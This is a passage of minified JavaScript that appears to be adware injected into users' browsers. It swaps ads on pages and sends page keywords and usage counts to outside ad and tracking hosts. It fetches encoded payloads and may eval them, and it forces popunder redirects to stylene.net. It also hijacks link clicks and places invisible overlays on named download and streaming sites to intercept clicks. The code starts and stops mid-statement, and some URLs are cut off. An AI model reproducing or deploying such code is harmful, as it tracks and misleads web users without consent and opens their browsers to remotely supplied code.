b=0,d=c.length;b<d;b++)\"keywords\"!=c.name.toLowerCase()&&\"description\"!=c.name.toLowerCase()||(a+=\" \"+c.content.replace(/,/g,\" \"));if(b=document.getElementsByTagName(\"a\")){c={};for(d=0;d<b.length;d++)try{var e=b[d].innerText;\"undefined\"==typeof e&&(e=b[d].textContent);for(var f=e.toLowerCase().split(/[\\s,-]/g),h=0;h<f.length;h++)4>f[h].length||(c[f[h]]?c[f[h]]++:\nc[f[h]]=1)}catch(k){}var e=[],g;for(g in c)e.push([g,c[g]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(g=0;g<e.length;g++)a+=\" \"+e[g][0]}return a.replace(/[_-]/g,\" \").substring(0,1024)},setMarker:function(){var a=document.getElementsByTagName(\"body\")[0];a&&!a.getAttribute(\"jhjlijpomuhn_l\")&&a.setAttribute(\"jhjlijpomuhn_m\",\"l\")},init:function(){adzy653rk.setMarker();var a=document.getElementsByTagName(\"iframe\");if(a.length){for(var c=[],b=0;b<a.length;b++)stngs.checkif(a)||(a.setAttribute(adzy653rk.imp.rattr,\n\"true\"),a.setAttribute(\"replaced\",\"true\"),c.push(a));if(c.length){var d=function(a){if(a>=c.length){var b=adzy653rk.imp;adzy653rk.jbs.at.length?adzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+b.pid+\"&subid1=\"+b.hid+\"&subid2=\"+b.eid+\"&lt=\"+b.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords())+(adzy653rk.topHost?\"&tdh=\"+encodeURIComponent(adzy653rk.topHost):\"\"),\"seta\"):adzy653rk.destruct()}else{if(b=\nadzy653rk.getAt(c[a]))adzy653rk.jbs.ifr.push(c[a]),adzy653rk.jbs.at.push(b);setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},dfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300<a))){var c=function(b){b>=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},1200):(adzy653rk.src&&adzy653rk.ifr&&adzy653rk.ifr.src!=adzy653rk.src[0]&&(adzy653rk.ifr.nextSibling.innerHTML&&adzy653rk.ifr.nextSibling.innerHTML.match(/<span[^>]?>Ads( not)? by/i)?\n(new Image).src=\"http://zig.installer...bc'>.src):((new Image).src=\"http://zig.installer...umber\"==typeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var c=adzy653rk.imp.sizes,b=0;b<c.length;b++)if(a[0]>=c[0]-5&&a[0]<=c[0]+5&&a[1]>=c[1]-5&&a[1]<=c[1]+\n5)return c[2];return!1},getAds:function(a,c){if(-1<navigator.userAgent.indexOf(\"MSIE\")){var b=document.createElement(\"script\");b.type=\"text/javascript\";b.src=a+\"&cb=adzy653rk.\"+c;b.onreadystatechange=b.onload=function(){try{b.parentNode.removeChild(b)}catch(a){}};try{window.adzy653rk=adzy653rk,(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild(b)}catch(d){}}else{var e=new XMLHttpRequest;e.open(\"GET\",a,!0);e.onreadystatechange=function(){if(4==e.readyState)adzy653rk[c](e.response)};\ne.send(null)}},seta:function(a){var c=null;try{var b=adzy653rk.l.decode(a);\"undefined\"!=typeof JSON&&JSON.parse?c=JSON.parse(b):eval(\"ifrl = \"+b)}catch(d){}if(c&&c.length)for(a=0;a<c.length;a++)c[a]&&adzy653rk.jbs.ifr[a]&&adzy653rk.ifrset(adzy653rk.jbs.ifr[a],c[a]);adzy653rk.destruct()},ifrset:function(a,c,b){b||(adzy653rk.ifr.push(a),c[0]=c[0].replace(/\\[##([^#]+)##\\]/g,function(a,b){return adzy653rk.imp[toekn]?adzy653rk.imp[toekn]:\"\"}));var d=[\"<html><head><style>html,body{width:100%;height:100%;margin:0}</style></head><body>\",\n\"</body></html>\"];switch(c[1]){case 1:a.src=c[0]+(-1<c[0].indexOf(\"?\")?\"&\"+adzy653rk.imp.jpshort+\"=\"+c[2]+\"_18x18_0\":\"\");break;case 2:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+'<iframe src=\"'+c[0]+'\" style=\"width:100%;height:100%;border:0;\" scrolling=\"no\" frameborder=\"0\"></iframe>'+d[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+c[0]+d[1])}catch(f){}}b||adzy653rk.src.push([a.src,c])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",\ndecode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var c=\"\",b=0;b<a.length;){var d=this.xlat.indexOf(a.charAt(b++)),e=this.xlat.indexOf(a.charAt(b++)),f=this.xlat.indexOf(a.charAt(b++)),h=this.xlat.indexOf(a.charAt(b++)),k=(e&15)<<4|f>>2,g=(f&3)<<6|h,c=c+String.fromCharCode(d<<2|e>>4);64!=f&&0<k&&(c+=String.fromCharCode(k));64!=h&&0<g&&(c+=String.fromCharCode(g))}return this._utf8_decode©},_utf8_decode:function(a){for(var c=\"\",b=0;b<a.length;){var d=a.charCodeAt(b);if(128>d)c+=\nString.fromCharCode(d),b++;else if(191<d&&224>d)var e=a.charCodeAt(b+1),c=c+String.fromCharCode((d&31)<<6|e&63),b=b+2;else var e=a.charCodeAt(b+1),f=a.charCodeAt(b+2),c=c+String.fromCharCode((d&15)<<12|(e&63)<<6|f&63),b=b+3}return c}}};\nadzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 && adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"ad.z5x.net exchange.admailtiser.com ad.yieldmanager.com ad.adserverplus.com servedby.adxplosions.com cdn.trkclk.net srv.aileronx.com smgadserver.com vqtm.nongchangwangzhan.com servedby.adsplats.com advs.adgorithms.com ads.ad-maven.com ad.adnetwork.net ads.incmd03.com cdn.adk2.com Servedby.bigfineads.com ads.incmd05.com a.ad-sys.com afx.tagcdn.com ads.mediasoul.net www.kbdadsfast.com c5.zedo.com ib.adnxs.com ad.jumbaexchange.com srv1.mediads.info tr.adsplats.com ad.improvemedianetwork.com cmen.197865.com media.glispa.com optimizedby.brealtime.com ads.mangomediaads.com www.adshost2.com evzc.wdfbj.com ads3.mediashakers.com lird.jianggongren.com nptv.nongchangwangzhan.com ads.ventivmedia.com ad.reachjunction.com ads.deliads.com pzez.nongchangwangzhan.com ydpk.nongchangwangzhan.com ads.mediawhite.com lema.jianggongren.com ads.geverads.netdna-cdn.com an.z5x.net tala.intlsources.com adsrv.intelliad.com myim.nongchangwangzhan.com ty.bizwz.com zaao.nongchangwangzhan.com ads.sonobi.com ifh.wdfbj.com cher.ehomestudy.com fw.adsafeprotected.com track.btmobm.com\".indexOf(window.self.location.hostname)==-1 && adzy653rk.location.indexOf(\"zoneid=506761\")==-1 && adzy653rk.location.indexOf(\"zoneid=511181\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 && adzy653rk.location.indexOf(\"1018-1005\")==-1 && adzy653rk.location.indexOf(\"1019-1001\")==-1 && adzy653rk.location.indexOf(\"PT1312\")==-1) adzy653rk.init()})();(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"P3FbVFSu=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"P3FbVFSu=\")){var d=a.match(/P3FbVFSu=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.websco...s5rjg6rjnFrdk8\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{if(window.opener&&window.self==window.top&&(!window.name.match(/^(a652c|ld893)_/))&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&-1==document.referrer.indexOf('/sd/dw32.html')&&-1==document.referrer.indexOf('/pop/1.1.00')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"nkths.co\")&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/sd/dw32.html')&&-1==window.self.location.href.indexOf('/pop/1.1.00')&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://stylene.net/z...1055&pid=1&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://stylene.net/x...fined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://stylene.net/z...h.random());var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};;new function(){var p=this;this.activeZds={\"uploading.com\":0,\"dirpy.com\":0,\"go4up.com\":1,\"mp3olimp.org\":1,\"hulkload.com\":0,\"free-tv-video-online.me\":1,\"ehd.c\":1,\"hesefiles.c\":1,\"sharebeast.com\":0,\"coolrom.com\":1,\"ebookbrowsee.net\":1,\"mirrorcreator.com\":0,\"cloud-vibe.com\":0,\"mp3seal.com\":0,\"mp3vampire.com\":0,\"minecraftdl.com\":0,\"leunlckr.co\":0,\"go.theadsnet.com\":1,\"ziddu.com\":1,\"opensubtitles.org\":1,\"romptfile.co\":1,\"pensoftwareupdater.co\":1,\"veehd.com\":1,\"ullypcgames.ne\":0,\"llplayer.com.b\":1,\"ubtitulosespanol.or\":1,\n\"ubtitles4free.ne\":1,\"legendasbrasil.org\":1,\"reeroms.co\":0,\"eneral-ebooks.co\":0,\"stream2watch.me\":1,\"kickass.to\":1,\"pensubtitles.us\":1,\"uploadrocket.net\":0};this.utils=new function(){var e=this;e.sendPixels=function(h){var e;if(h instanceof Array)for(var l=0;l<h.length;l++){var m=h[l];e=new Image;e.src=m}else e=new Image,e.src=h};e.isFalse=function(h){return\"undefined\"==typeof h||0===h.length||null===h};e.cookie=new function(){var h=this;h.createCookie=function(h,e,m){if(m){var n=new Date;n.setTime(n.getTime()+\n864E5*m);m=\"; expires=\"+n.toGMTString()}else m=\"\";document.cookie=h+\"=\"+e+m+\"; path=/\"};h.readCookie=function(h){h+=\"=\";for(var e=document.cookie.split(\";\"),m=0;m<e.length;m++){for(var n=e[m];\" \"==n.charAt(0);)n=n.substring(1,n.length);if(0==n.indexOf(h))return n.substring(h.length,n.length)}return null};h.eraseCookie=function(e){h.createCookie(e,\"\",-1)}};e.ajax={get:function(h,k){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",h,!0),this.xhr.onreadystatechange=function(){4==e.ajax.xhr.readyState&&\nk(e.ajax.xhr.responseText)},this.xhr.send()}catch(l){}},post:function(h,k,l){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",h,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==e.ajax.xhr.readyState&&l(e.ajax.xhr.responseText)};k=encodeURIComponent(k);this.xhr.send(k)}};e.waitForTokens={};e.addScript=function(h,e){if(\"bing\"==e){var l=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=\ndocument.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(h);Element.prototype.appendChild=l}else document.getElementsByTagName(\"head\")[0].appendChild(h)};e.waitForElement=function(h,k,l,m){var n=e.query_selector_all(h);clearTimeout(e.waitTimeout);if(25<p.waitForElementCounter)return k(null);if(\"undefined\"==typeof n||1>n.length){if(e.waitForTokens[m])return k(null);var r=arguments.callee;e.waitTimeout=setTimeout(function(){p.waitForElementCounter++;r(h,k,l,m)},l)}else{if(e.waitForTokens[m])return k(null);\ne.waitForTokens[m]=!0;p.waitForElementCounter=0;return k(n)}};e.flushWaitForTokens=function(){e.waitForTokens={}};e.getRandomInt=function(h,e){return Math.floor(Math.random()*(e-h+1))+h};e.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(h){return{getPropertyValue:function(k){\"float\"==k&&(k=\"styleFloat\");k=e.dhtml_prop_name(k);return\"object\"==typeof h.currentStyle&&null!=h.currentStyle&&\"undefined\"!=typeof h.currentStyle[k]?h.currentStyle[k]:null}}}:function(h,e){return window.getComputedStyle(h,\ne)||{getPropertyValue:function(){}}};e.query_selector_all=document.querySelectorAll?function(h){try{return document.querySelectorAll(h)}catch(e){}}:function(h){var e=h.match(/^#([^,\\s]+)$/)||[];if(1<e.length)return h=document.getElementById(e[1])||void 0,\"undefined\"!=typeof h?[h]:[];e=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(e);document.__asya_qsaels=[];e.styleSheet.cssText=h+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};\ne.clone_object=window.JSON instanceof Object?function(e){if(e instanceof Object&&(e=JSON.stringify(e),\"string\"==typeof e))return JSON.parse(e)}:function(e){if(e instanceof Object){var k=new e.constructor,l;for(l in e)k[l]=arguments.callee(e[l]);return k}return e};e.dhtml_prop_name=function(e){return e.replace(/(\\-([a-z]){1})/g,function(e,h,m){return m.toUpperCase()})};e.wildcard_to_regex=function(e){e=e.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");e=e.replace(/\\*/g,\".*\");return new RegExp(e)};e.throttle=\nfunction(e,k){var l=null;return function(){var m=this,n=arguments;clearTimeout(l);l=setTimeout(function(){e.apply(m,n)},k)}};e.epoch=function(){return(new Date).getTime()};e.msie=function(){var e=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(e)&&(e=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(e)?!1:e}();e.version_ie_less=function(e){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=\ne?!0:!1};e.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};e.match_url=function(h,k){for(var l=0;l<k.length;l++)if(\"string\"==typeof k[l]){var m;m=/^\\/.+\\/$/.test(k[l])?new RegExp(k[l]):e.wildcard_to_regex(k[l]);if(m instanceof RegExp&&m.test(h))return!0}};e.ping=function(e){for(var k=[\"google\",\"bing\",\"yahoo\",\"youtube\"],l=0;l<k.length;l++)if(-1<location.hostname.indexOf(k[l])){var m=\nnew Image,n=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<n.length&&(n=encodeURIComponent(location.hostname));var r=encodeURIComponent(location.hostname);m.src=p.pixelHost+\"?hid=7436871928167141055&eid=72&pid=1&prodid=338&v=\"+p.version+\"&ch=\"+e+\"&lan=\"+navigator.language+\"&cc=US&pr=\"+k[l]+\"&host=\"+r+\"&ref=\"+n}}};this[\"uploading.com\"]=new function(){this.init=function(){if(window.self===window.top&&location.host.toLowerCase().indexOf(\"ploading.com/files/\"))for(var e=\ntypeof document.querySelectorAll?document.getElementsByTagName(\"div\"):document.querySelectorAll(\"div.method_title\"),h=0;h<e.length;h++){var k=e[h].className;k&&\"undefined\"!==typeof k&&-1<k.indexOf(\"method_title\")&&(k=e[h].getAttribute(\"onclick\"))&&\"undefined\"!==typeof k&&-1<k.indexOf(\"location.href\")&&(e[h].setAttribute(\"onclick\",\"void(0);\"),k=e[h].cloneNode(!0),e[h].parentNode.replaceChild(k,e[h]),k.setAttribute(\"onclick\",\"void(0);\"))}}};this[\"dirpy.com\"]=new function(){this.init=function(){try{f=\nfunction(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(e){}},-1< !navigator.userAgent.indexOf(\"chrome\")?f():(g=document.createElement(\"script\"),g.innerHTML=\"(\"+f.toString()+\")()\",document.body.appendChild(g))}catch(e){}new function(){-1<location.host.toLowerCase().indexOf(\"irpy.co\")&&(window.__irpyCount=0,window.__irpyInt=setInterval(function(){for(var e=document.links,k=0;k<e.length;k++){var l=e[k].getAttribute(\"href\");if(null!=l&&-1<l.toLowerCase().indexOf(\"dirpy.com/download/\")){l=\ndocument.createElement(\"div\");l.style.top=\"0\";l.style.width=\"100%\";l.style.height=\"100%\";l.style.cursor=\"pointer\";l.style.zIndex=\"2000\";l.style.position=\"absolute\";var m=e[k].parentNode;m.style.position=\"relative\";m.appendChild(l);clearInterval(window.__irpyInt)}}20<window.__irpyCount++&&clearInterval(window.__irpyInt)},250))}}};this[\"go4up.com\"]=new function(){this.init=function(){if(!window.__AAintervalCounter&&window.self==window.top&&-1<location.host.toLowerCase().indexOf(\"o4up.co\")){window.__AAintervalCounter=\n0;window.__AAinterval=setInterval(function(){var e=document.getElementById(\"linklist\");e.style.position=\"relative\";var h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.zIndex=\"2000\";h.style.height=\"100%\";h.style.width=\"100px\";h.style.right=\"30px\";h.style.top=\"0\";h.style.cursor=\"pointer\";e.appendChild(h);10<window.__AAintervalCounter&&clearInterval(window.__AAinterval)},1001);for(var e=document.getElementsByTagName(\"center\"),h=0;h<e.length;h++){var k=e[h].children[0];k&&k.setAttribute(\"href\",\n\"javascript:void(0);\");e[h].style.position=\"relative\";k=document.createElement(\"div\");k.style.position=\"absolute\";k.style.zIndex=\"2000\";k.style.height=\"100%\";k.style.width=\"100%\";k.style.right=\"0\";k.style.top=\"0\";k.style.cursor=\"pointer\";e[h].appendChild(k)}}}};this[\"mp3olimp.org\"]=new function(){this.init=function(){setTimeout(function(){for(var e=document.links,h=0;h<e.length;h++)if(\"return prepare_download_file(this);\"==e[h].getAttribute(\"onclick\")){var m=document.createElement(\"a\");m.className=\n\"link last\";m.setAttribute(\"href\",\"javascript:void(0);\");m.innerText?m.innerText=\"Download\":m.textContent=\"Download\";var n=e[h].parentNode,r=n.children[n.children.length-1];r&&(n.removeChild(e[h]),n.insertBefore(m,r))}},1E3);new function(){-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&(window.__intCount=0,window.__int=setInterval(function(){var e=document.getElementById(\"download-manager-checkbox\");if(null!==e)try{e.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=\n!1}catch(h){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250))};-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&(window.__intCount=0,window.__int=setInterval(function(){var e=document.getElementById(\"download-manager-checkbox\");if(null!==e)try{e.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(h){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250));if(-1<document.location.host.indexOf(\"p3olimp.or\")&&document.getElementsByClassName)for(c=\ndocument.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var e=document.getElementsByClassName(\"nasjfkla\"),h=0;h<e.length;h++)e[h].style.display=c.checked?\"block\":\"none\"},i=0;i<document.links.length;i++){var e=document.links[i],h=e.getAttribute(\"onclick\");h&&-1<h.indexOf(\"prepare_download_file\")&&(e=e.parentNode,e.style.position=\"relative\",b=document.createElement(\"div\"),b.className=\"nasjfkla\",b.style.position=\"absolute\",b.style.top=\"-2px\",b.style.left=\"92px\",b.style.width=\"71px\",\nb.style.height=\"16px\",b.style.zIndex=\"99999\",b.style.cursor=\"pointer\",e.appendChild(b))}-1<location.host.indexOf(\"p3olimp.or\")&&setTimeout(function(){for(var e=document.getElementById(\"leftside\"),h=0;h<e.children.length;h++)if(/\\bspnBook\\b/.test(e.children[h].className))for(var m=e.children[h].getElementsByTagName(\"a\"),n=0;n<m.length;n++)m[n].setAttribute(\"href\",\"#\"),m[n].setAttribute(\"target\",\"\")},1001)}};this[\"hulkload.com\"]=new function(){this.init=function(){new function(){-1<location.host.toLowerCase().indexOf(\"ulkload.co\")&&\n(window.___interCount=0,window.___interval=setInterval(function(){for(var e=document.getElementsByTagName(\"center\"),h=0;h<e.length;h++)if(0!=h&&!(-1<e[h].innerHTML.indexOf(\"adcopy-outer\")||-1<e[h].innerHTML.indexOf(\"btn_download\")||-1<e[h].innerHTML.indexOf(\"solvemedia puzzle widget\"))){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"1900\";k.style.position=\"absolute\";h==e.length-1?(k.style.bottom=\"0\",k.style.height=\"110px\"):k.style.top=\n\"0\";e[h].style.position=\"relative\";e[h].appendChild(k)}e=document.getElementById(\"cap\");null!=e&&(e.parentNode.style.position=\"relative\",e.parentNode.style.zIndex=\"2000\");20<window.___interCount++&&clearInterval(window.___interval)},500))}}};this[\"free-tv-video-online.me\"]=new function(){this.init=function(){if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){for(var e=document.getElementsByTagName(\"div\"),h=0;h<e.length;h++)if(e[h].style&&\"653px\"==e[h].style.width&&\n\"49px\"==e[h].style.height){var k=e[h];k.style.position=\"relative\";var l=document.createElement(\"div\");l.style.position=\"absolute\";l.style.cursor=\"pointer\";l.style.zIndex=\"2000\";l.style.width=\"100%\";l.style.height=\"50px\";l.style.top=\"0\";k.appendChild(l)}setTimeout(function(){for(var e=document.links,h=0;h<e.length;h++){var k=e[h].innerText?e[h].innerText:e[h].textContent;if(\"trackOutboundLink(this, 'Outbound Links', 'slinks.com'); return false;\"==e[h].getAttribute(\"onclick\")&&\"Stream Video Now!\"==\nk){k=document.createElement(\"a\");k.className=\"down\";k.setAttribute(\"href\",\"javascript:void(0);\");k.innerText?k.innerText=\"Stream Video Now!\":k.textContent=\"Stream Video Now!\";var l=e[h].parentNode,q=l.children[l.children.length-1];l.removeChild(e[h]);if(q)try{l.insertBefore(k,q)}catch(p){l.appendChild(k)}else l.appendChild(k)}}e=document.getElementsByTagName(\"a\");for(h=0;h<e.length;h++)if(\"getDownload();\"==e[h].getAttribute(\"onclick\"))if(k=document.createElement(\"p\"),k.className=\"dloadh\",k.setAttribute(\"href\",\n\"javascript:void(0);\"),k.innerText?k.innerText=\" \":k.textContent=\" \",l=e[h].parentNode,q=l.children[l.children.length-1],l.removeChild(e[h]),q)try{l.insertBefore(k,q)}catch(t){l.appendChild(k)}else l.appendChild(k)},1E3);e=document.createElement(\"script\");e.type=\"text/javascript\";e[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var e=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+\ne.top+\"px;left:\"+e.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(h){}}.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(e)}}};this[\"ehd.c\"]=new function(){this.init=function(){-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(g=document.createElement(\"img\"),g.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),g.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",\nf=document.getElementById(\"r1113566095\").parentNode,f.style.position=\"relative\",f.appendChild(g))}};this[\"hesefiles.c\"]=new function(){this.init=function(){-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\");if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var e=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",\n!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))e();else{var h=document.createElement(\"script\");h.type=\"text/javascript\";h.innerHTML=\"(\"+e.toString()+\")()\";document.body.appendChild(h)}}}};this[\"sharebeast.com\"]=new function(){this.init=function(){if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var e=document.getElementsByTagName(\"div\"),h;for(h in e)e[h]&&e[h].style&&\"fixed\"==e[h].style.position&&\"solid\"==\ne[h].style.borderBottomStyle&&(e[h].style.display=\"none\")}}};this[\"coolrom.com\"]=new function(){this.init=function(){for(var e=document.getElementsByTagName(\"img\"),h=0;h<e.length;h++)-1<e[h].src.indexOf(\"/images/download_large.png\")&&e[h].parentNode.setAttribute(\"href\",\"javascript:void(0);\");e=new Date;e.setTime(e.getTime()+2592E6);e=\"; expires=\"+e.toGMTString();document.cookie=\"installer=14604\"+e+\"; path=/;domain=.coolrom.com\"}};this[\"ebookbrowsee.net\"]=new function(){this.init=function(){}};this[\"mirrorcreator.com\"]=\nnew function(){this.init=function(){if(-1<document.location.host.indexOf(\"irrorcreator.co\"))for(var e=[\"verticdn.com\"],h=0;h<document.links.length;h++)for(var k=document.links[h],l=k.host,m=0;m<e.length;m++)e[m]==l&&(k.setAttribute(\"onclick\",\"return false\"),k.addEventListener(\"click\",function(e){e.returnValue=!1;e.preventDefault&&e.preventDefault()},!1))}};this[\"cloud-vibe.com\"]=new 